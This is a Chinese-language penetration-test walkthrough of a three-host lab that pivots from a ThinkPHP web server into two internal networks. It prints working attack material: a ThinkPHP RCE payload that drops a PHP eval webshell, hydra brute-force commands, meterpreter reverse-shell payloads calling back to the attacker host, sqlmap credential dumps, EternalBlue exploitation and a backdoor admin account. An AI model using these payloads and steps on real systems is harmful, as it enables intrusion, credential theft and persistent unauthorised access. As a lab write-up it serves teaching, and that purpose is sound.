渗透测试实战 - 外网渗透内网穿透(超详细)

这篇具有很好参考价值的文章主要介绍了渗透测试实战 - 外网渗透内网穿透(超详细)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

实验环境

做到一半环境崩了,IP地址以下面为准

Target1 - Centos7 (web服务)

此主机的IP地址:
192.168.41.136 (模拟公网IP能与物理机通讯)
192.168.22.132

Target2 - Ubuntu (内网web服务)

此主机的IP地址:
192.168.22.133
192.168.33.130

Target3 - Windows7 (客户端)

此主机的IP地址:
192.168.33.33

实验目的

拿下三台主机权限

实验步骤

测试Target1

信息收集

使用dirsearch扫描192.168.41.136的网站目录,发现 http://192.168.41.136/index.php 是Thinkphp框架

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

nmap扫描端口

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

22/21端口 弱口令爆破(MSF,hydra)
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.41.136
set USER_FILE /root/Desktop/tools/dic_username_ssh.txt
set PASS_FILE /root/Desktop/tools/pwd100.txt
 hydra -L /home/kali/Desktop/sshfuzz/user.txt -P /home/kali/Desktop/sshfuzz/pass.txt 192.168.41.136 ssh -f

 hydra -L /home/kali/Desktop/sshfuzz/user.txt -P /home/kali/Desktop/sshfuzz/pass.txt 192.168.41.136 ftp -f
3306端口

不允许远程IP登录

渗透测试实战 - 外网渗透内网穿透(超详细)

8888端口

宝塔界面未知账号密码无法利用

渗透测试实战 - 外网渗透内网穿透(超详细)

80端口

Thinkphp v5.0 存在远程命令执行漏洞,通过命令执行写入一句话,可 GetShell

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

php一句话木马 poc

/index.php?
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put
_contents&vars[1][]=admin123.php&vars[1][]=<?php @eval($_POST[123]);?>

使用蚁剑链接成功

渗透测试实战 - 外网渗透内网穿透(超详细)

web服务器成功拿下 (192.168.41.136)

渗透测试实战 - 外网渗透内网穿透(超详细)

主机信息收集

ifconfig 发现存在22网段

上传脚本到 /tmp目录 ,扫描22网段 ping.sh

#!/bin/bash
for num in {1..254};
  do
    ip=192.168.22.$num
    ping -c1 $ip >/dev/null 2>&1
    if [ $? = 0 ];
    then
      echo "$ip" ok
    else
      echo "$ip" fail
    fi
  done

赋予ping.sh 权限,并执行

chmod 777 ping.sh

./ping.sh > ping.txt

但执行不了,不知道是不是环境问题,换另一个方法上传一个fscan内网扫描工具

使用bash反弹shell的方法,反弹到攻击机

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

赋予fscan 权限并执行,发现存活主机 192.168.22.133/132 以及端口开放情况发现192.168.22.133是一个CMS

./fscan_amd64 -h 192.168.22.0/24

渗透测试实战 - 外网渗透内网穿透(超详细)

反弹shell到msf

反弹 Target1 的 Shell 到 MSF

msfvenom生成payload
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.41.130 lport=6666 -f elf -o msf.elf
上传到 Target1 的 /tmp 目录下执行
# 赋予执行权限
chmod 777 msf.elf
# 执行程序
./msf.elf

渗透测试实战 - 外网渗透内网穿透(超详细)

meterpreter > run get_local_subnets 获取网段信息

渗透测试实战 - 外网渗透内网穿透(超详细)

建立Socks代理

获得 Target1 的 meterpreter shell 后,添加到 192.168.22.0/24 网段的路由

run autoroute -s 192.168.22.0/24
run autoroute -p

渗透测试实战 - 外网渗透内网穿透(超详细)

使用 MSF 的 socks5 模块启动 socks 代理服务

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run

渗透测试实战 - 外网渗透内网穿透(超详细)

配置 proxychains 代理工具

vim /etc/proxychains4.conf
socks5 127.0.0.1 1080

渗透测试实战 - 外网渗透内网穿透(超详细)

也可以使用 stowaway 代理

1、攻击机启动admin监听

./admin -l 4444 -s hack

渗透测试实战 - 外网渗透内网穿透(超详细)

2、Target1启动agent

./agent -c 192.168.41.130:4444 -s hack

渗透测试实战 - 外网渗透内网穿透(超详细)

3、开启socks代理

进入Target1的node节点,使用socks命令开启socks代理

use 0
socks 1080

渗透测试实战 - 外网渗透内网穿透(超详细)

4、编辑 proxychains4.conf 文件

vim /etc/proxychains4.conf

渗透测试实战 - 外网渗透内网穿透(超详细)

5、测试socks代理,使用proxychains工具

渗透测试实战 - 外网渗透内网穿透(超详细)

测试Target2

信息收集

22网段进行内网扫描,

proxychains nmap -sT -Pn -p- -n -T4 192.168.22.133

渗透测试实战 - 外网渗透内网穿透(超详细)

21/22端口

弱口令爆破 爆破不成功

proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 
192.168.22.22 ftp
proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 
192.168.22.22 ssh
proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 
192.168.22.22 mysql

渗透测试实战 - 外网渗透内网穿透(超详细)

8888端口

宝塔页面无法利用

80端口

上面信息收集发现80端口是个Bagecms的框架,寻找历史漏洞挨个测试发现存在SQL注入漏洞,使用查找到的POC ,使用sqlmap工具进行测试

通过连接代理服务器,可使本地物理机访问内网的web页面,也可以明显看出是bagecms

渗透测试实战 - 外网渗透内网穿透(超详细)

proxychains sqlmap -u 'http://192.168.22.133/index.php?r=vul&keyword=1' -p keyword

渗透测试实战 - 外网渗透内网穿透(超详细)

爆数据库

proxychains sqlmap -u 'http://192.168.22.133/index.php?r=vul&keyword=1' -p keyword --dbs

渗透测试实战 - 外网渗透内网穿透(超详细)

爆bagecms的表名

proxychains sqlmap -u 'http://192.168.22.133/index.php?r=vul&keyword=1' -p keyword -D bagecms --tables

渗透测试实战 - 外网渗透内网穿透(超详细)

爆bage_admin 的列的数据

proxychains sqlmap -u 'http://192.168.22.133/index.php?r=vul&keyword=1' -p keyword -D bagecms -T bage_admin --dump

渗透测试实战 - 外网渗透内网穿透(超详细)

得到后台登录账号密码为:admin/123qwe

使用Proxifier工具设置本地物理机全局代理,使得使用御剑目录扫描工具扫描内网web服务

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

通过御剑目录扫描在,访问 /robots.txt 目录发现了目录泄露,访问得到了管理后台的地址

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

登录进后台 -> 模板 -> 在 site文件夹 index.php 文件后面添加一句话马 -> 用 蚁剑 配置 socks 代理连接webshell

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

成功连接 上线target2目标机器

渗透测试实战 - 外网渗透内网穿透(超详细)

并且为root用户(拿下192.168.22.133 服务器权限)

渗透测试实战 - 外网渗透内网穿透(超详细)

主机信息收集

ifconfig

发现存在192.168.33.0/24的内网网段。

渗透测试实战 - 外网渗透内网穿透(超详细)

使用stowaway二层socks代理

1、在node中开启监听

进入node 0节点,执行listen,设置监听端口,开启监听模式

use 0
listen
1
7070

渗透测试实战 - 外网渗透内网穿透(超详细)

在 Target1 上可以看到 agent 监听了 7070 端口

渗透测试实战 - 外网渗透内网穿透(超详细)

2、Target2连接监听端口

在 Target2 中连接 Target1 监听的 7070 端口

./agent -c 192.168.22.130:7070 -s hack

3、开启Socks代理

admin 接收到新的 node 1 , 进入 node 1 节点开启 socks 代理

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

4、修改proxychains4.conf 文件 测试代理

vim /etc/proxychains4.conf  

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

创建ping.sh脚本进行内网存活探测 发现192.168.33.33主机存活

#!/bin/bash
for num in {1..254};
  do
    ip=192.168.22.$num
    ping -c1 $ip >/dev/null 2>&1
    if [ $? = 0 ];
    then
      echo "$ip" ok
    else
      echo "$ip" fail
    fi
  done

渗透测试实战 - 外网渗透内网穿透(超详细)

测试Target3

信息收集

proxychains3 nmap -sT -Pn -p- -n -T4 192.168.33.33

渗透测试实战 - 外网渗透内网穿透(超详细)

使用内网扫描工具fscan,进行三网段扫描发现 192.168.33.33为Windows 7 系统,并且存在MS17-010漏洞

渗透测试实战 - 外网渗透内网穿透(超详细)

分析利用

知道了存在MS17-010漏洞,而且这个漏洞永恒之蓝是通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机

打开攻击机的MSF,反弹Target1\2的shell,生成linux系统的木马payload

msfvenom -p linux/x64/meterpreter/bind_tcp lport=5554 -f elf > target1.elf
msfvenom -p linux/x64/meterpreter/bind_tcp lport=5555 -f elf > target2.elf

通过蚁剑上传到服务器目录并执行,得到target1和target2的session,并配置路由

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

使用MSF的针对MS17-010的扫描模块进行漏洞检测,发现确实存在MS17-010漏洞

渗透测试实战 - 外网渗透内网穿透(超详细)

利用MS17-010模块进行漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.33.33
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 
windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

渗透测试实战 - 外网渗透内网穿透(超详细)

use exploit/windows/smb/ms17_010_psexec
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.33.33
msf6 exploit(windows/smb/ms17_010_psexec) > set payload 
windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set LPORT 4444
msf6 exploit(windows/smb/ms17_010_psexec) > exploit

渗透测试实战 - 外网渗透内网穿透(超详细)

拿到了target3的session,并且为system权限(192.168.33.33)

渗透测试实战 - 外网渗透内网穿透(超详细)

利用上面的信息收集发现此主机开放了3389远程端口,那么我们可以直接使用物理机进行远程桌面连接

3389端口
# 添加管理员用户
net user test test123 /add
net localgroup administrators test /add
# 查看管理员用户
net localgroup administrators

渗透测试实战 - 外网渗透内网穿透(超详细)

添加完管理用户,使用proxifier软件设置代理

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

使用Windows自带的远程软件进行远程连接

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

如果有用户正在登录则等30秒自动踢下线

渗透测试实战 - 外网渗透内网穿透(超详细)

渗透测试实战 - 外网渗透内网穿透(超详细)

拿下主机,并且只有一个网段,渗透完成!!!!文章来源地址https://www.toymoban.com/news/detail-420962.html

到了这里,关于渗透测试实战 - 外网渗透内网穿透(超详细)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 外网访问本地Tomcat服务器【cpolar内网穿透】

    Tomcat作为一个轻量级的服务器,不仅名字很有趣(让人想起童年),也拥有强大功能,由于其可以实现JavaWeb程序的装载,就成为配置JSP和Java系统必备的环境软件,也是开发调试JSP程序的首选。Tomcat运行稳定且开源免费,加上apache和Sun的加持即免费和开源的特性,使其广泛应

    2023年04月08日
    浏览(33)
  • 如何安装 Wnmp 并结合内网穿透实现外网访问内网Wnmp 服务

    WNMP是Windows系统下的绿色Nginx+Mysql+PHP环境集成套件包,安装完成后即可得到一个Nginx + MySQL + PHP 环境,常用来搭建动态网站或者服务器。可直接安装 Discuz!,PHPWind,DeDeCMS,WordPress 等程序,是 Windows 下 PHP 建站的高效方案,本教程主要介绍如何下载安装 Wnmp 以及结合cpolar内网穿

    2024年02月07日
    浏览(54)
  • 外网SSH远程连接linux服务器「cpolar内网穿透」

    转载自内网穿透工具的文章:无公网IP,SSH远程连接Linux CentOS服务器【内网穿透】 本次教程我们来实现如何在外公网环境下,SSH远程连接家里/公司的Linux CentOS服务器,无需公网IP,也不需要设置路由器。 公网SSH远程Linux CentOS服务器【内网穿透】 cpolar官网:https://www.cpolar.com

    2023年04月23日
    浏览(64)
  • 内网安装管家婆软件如何实现外网访问?内网穿透的几种方案教程

    管家婆软件从网络架构上分 两 种版本:web(浏览器http端口)访问的版本和客户端(211固定端口+sqlserver数据库)访问的版本。公司库管经常用仓库登录管家婆 , 一旦需要在公司外 部 登陆访问 管家婆客户端 , 就需要在 异地组网 、 增加专线等 , 需要较 高 的成本投入和技

    2024年02月15日
    浏览(38)
  • Python一行命令搭建HTTP服务器并外网访问 - 内网穿透

    转载自远程内网穿透的文章:【Python】快速简单搭建HTTP服务器并公网访问「cpolar内网穿透」 Python作为热度比较高的编程语言,其语法简单且语句清晰,而且python有良好的兼容性,可以轻松的和其他编程语言((比如C/C++))建立的模块连接起来,而且python丰富强大的库,经过封

    2023年04月24日
    浏览(89)
  • Python一行命令搭建HTTP服务器并外网访问【内网穿透】

    转载自远程内网穿透的文章:【Python】快速简单搭建HTTP服务器并公网访问「cpolar内网穿透」 Python作为热度比较高的编程语言,其语法简单且语句清晰,而且python有良好的兼容性,可以轻松的和其他编程语言((比如C/C++))建立的模块连接起来,而且python丰富强大的库,经过封

    2023年04月20日
    浏览(50)
  • Python一行命令搭建HTTP服务器并外网访问+-+内网穿透

    Python作为热度比较高的编程语言,其语法简单且语句清晰,而且python有良好的兼容性,可以轻松的和其他编程语言((比如C/C++))建立的模块连接起来,而且python丰富强大的库,经过封装可以轻松调用,因此深受欢迎。 今天我们就尝试用python,建立一个简单的http服务器,用来

    2024年02月11日
    浏览(59)
  • MCSM面板一键搭建我的世界服务器-外网远程联机【内网穿透】

    转载自远程穿透文章:【Minecraft开服教程】使用 MCSM 面板一键搭建我的世界服务器,并内网穿透公网远程联机 MCSManager是一个开源、分布式、轻量级、一键开服、支持大部分游戏服务端和控制台程序的管理工具,我们可以用它来一键部署搭建Minecraft我的世界服务器,跟小伙伴

    2024年02月01日
    浏览(40)
  • SSH隧道搭建简单使用;本地电脑局域网内网穿透外网访问

    参考: https://www.zsythink.net/archives/2450 https://luckyfuture.top/ssh-tunnel#SSH%E9%9A%A7%E9%81%93 https://zhuanlan.zhihu.com/p/561589204?utm_id=0 1、 SSH隧道(搭建SSH隧道绕过防火墙): ssh命令除了登陆外还有代理转发功能 SSH 隧道是 SSH 中的一种机制,它能够将其他 TCP 端口的网络数据通过 SSH 连接来转

    2024年02月04日
    浏览(58)
  • 内网IP端口提供外网连接访问?快解析动态域名与内网映射P2P穿透方案

    我们在本地搭建服务器及发布互联网时,可以通过动态域名的方式联网。DDNS原理是用固定的域名代替变化IP,实现局域网发布公网,是适合本地动态IP环境的使用。但当本地没有公网IP时,如果解析绑定到内网IP,将内网IP端口提供外网连接访问?这时我们就需要用到内网映射

    2024年02月07日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包